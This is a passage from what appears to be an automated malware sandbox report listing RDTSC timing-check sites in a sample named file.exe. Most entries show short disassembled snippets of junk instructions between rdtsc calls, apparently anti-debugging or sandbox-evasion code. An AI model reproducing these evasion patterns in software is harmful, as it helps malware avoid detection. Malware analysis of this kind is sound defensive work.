push 00000000h 0x00000054 push esi 0x00000055 call 00007F5E8080F358h 0x0000005a pop esi 0x0000005b mov dword ptr [esp+04h], esi 0x0000005f add dword ptr [esp+04h], 0000001Ch 0x00000067 inc esi 0x00000068 push esi 0x00000069 ret 0x0000006a pop esi 0x0000006b ret 0x0000006c pushad 0x0000006d mov edi, 3976B121h 0x00000072 add dword ptr [ebp+122D3A56h], edx 0x00000078 popad 0x00000079 push eax 0x0000007a push eax 0x0000007b push edx 0x0000007c jns 00007F5E8080F35Ch 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D440CC second address: D440D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D44475 second address: D44493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5E8080F368h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D445E1 second address: D445FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E810FCBB4h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48F19 second address: D48F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48F26 second address: D48F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48F2C second address: D48F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48F30 second address: D48F34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4C169 second address: D4C185 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5E8080F367h 0x00000008 jmp 00007F5E8080F361h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4C185 second address: D4C1B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E810FCBB0h 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F5E810FCBB2h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E196 second address: D4E1B2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5E8080F35Eh 0x00000008 jbe 00007F5E8080F356h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F5E8080F358h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E1B2 second address: D4E1B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E1B8 second address: D4E1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E1BE second address: D4E1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC0011 second address: CC001D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC001D second address: CC0023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50D6E second address: D50D8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 jne 00007F5E8080F356h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5E8080F35Dh 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D54F15 second address: D54F22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D54753 second address: D54757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D54757 second address: D5475D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D548BB second address: D548D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F5E8080F362h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D548D8 second address: D548E4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5E810FCBA6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58CF5 second address: D58D13 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5E8080F356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jne 00007F5E8080F356h 0x00000011 jmp 00007F5E8080F35Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58D13 second address: D58D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E810FCBAEh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D57F88 second address: D57FD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F368h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jmp 00007F5E8080F364h 0x00000011 pop edx 0x00000012 jmp 00007F5E8080F364h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D57FD0 second address: D57FD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D57FD8 second address: D57FDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58169 second address: D5817C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007F5E810FCBA6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5817C second address: D58182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58182 second address: D58187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58497 second address: D584C3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5E8080F370h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F5E8080F368h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 js 00007F5E8080F356h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5862C second address: D58632 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58632 second address: D58636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58636 second address: D58651 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5E810FCBABh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F5E810FCBA6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5E764 second address: D5E76A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5E76A second address: D5E76E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5E76E second address: D5E798 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F364h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F5E8080F35Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5E798 second address: D5E79C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5D05A second address: D5D05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5D05E second address: D5D06F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBADh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5D4DD second address: D5D4E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5D4E3 second address: D5D4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0806F second address: D08075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D08075 second address: D08079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DA3A second address: D5DA4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5E8080F35Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6560F second address: D65613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D658E4 second address: D658EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D658EA second address: D658EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D65BB1 second address: D65BD7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5E8080F356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F5E8080F369h 0x00000010 jmp 00007F5E8080F363h 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D08668 second address: D0866C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D66C74 second address: D66C78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D66F39 second address: D66F6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB9h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F5E810FCBB2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6B24D second address: D6B257 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E8080F356h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6B257 second address: D6B25D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6B25D second address: D6B270 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F35Ch 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6A41F second address: D6A42B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6A42B second address: D6A444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F5E8080F356h 0x0000000a jmp 00007F5E8080F35Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6A444 second address: D6A469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5E810FCBB4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6A87A second address: D6A8A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F35Ch 0x00000007 jmp 00007F5E8080F360h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6A8A0 second address: D6A8B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5E810FCBA6h 0x0000000a popad 0x0000000b je 00007F5E810FCBAEh 0x00000011 jns 00007F5E810FCBA6h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AA10 second address: D6AA15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AA15 second address: D6AA1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AE3E second address: D6AE47 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AE47 second address: D6AE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AE56 second address: D6AE75 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5E8080F356h 0x00000008 jns 00007F5E8080F356h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5E8080F35Bh 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78003 second address: D78019 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E810FCBB1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D76918 second address: D76948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jns 00007F5E8080F35Ah 0x0000000b jno 00007F5E8080F35Ch 0x00000011 popad 0x00000012 jp 00007F5E8080F37Bh 0x00000018 jnc 00007F5E8080F35Ah 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D76948 second address: D7694E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D76D00 second address: D76D32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F368h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F5E8080F361h 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D75E1D second address: D75E23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D75E23 second address: D75E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5E8080F35Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7A568 second address: D7A59F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F5E810FCBB7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7A59F second address: D7A5A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C8EA second address: D7C8FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 je 00007F5E810FCBCAh 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C8FB second address: D7C904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D81778 second address: D8177C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8177C second address: D817A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5E8080F361h 0x0000000d pushad 0x0000000e jne 00007F5E8080F356h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D81075 second address: D8107B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8107B second address: D81081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D81081 second address: D81085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D81085 second address: D810D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E8080F369h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5E8080F365h 0x00000012 jmp 00007F5E8080F369h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8140C second address: D81410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D81410 second address: D81432 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F5E8080F365h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D81432 second address: D81437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D82DCD second address: D82DE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E8080F35Fh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D90FDB second address: D9100C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jo 00007F5E810FCBB4h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F5E810FCBACh 0x00000012 push edx 0x00000013 jmp 00007F5E810FCBB2h 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9100C second address: D91010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D94707 second address: D9470B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA0F2 second address: DAA10D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007F5E8080F360h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA27C second address: DAA286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5E810FCBA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA286 second address: DAA29C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F362h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA542 second address: DAA546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA546 second address: DAA54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA54C second address: DAA553 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA808 second address: DAA80C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA97A second address: DAA984 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5E810FCBB2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAAB44 second address: DAAB4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAAB4C second address: DAAB6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edi 0x00000008 pushad 0x00000009 push ebx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop ebx 0x0000000d jmp 00007F5E810FCBACh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAB4C7 second address: DAB4CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAB4CF second address: DAB4D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAB4D5 second address: DAB4F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5E8080F35Dh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
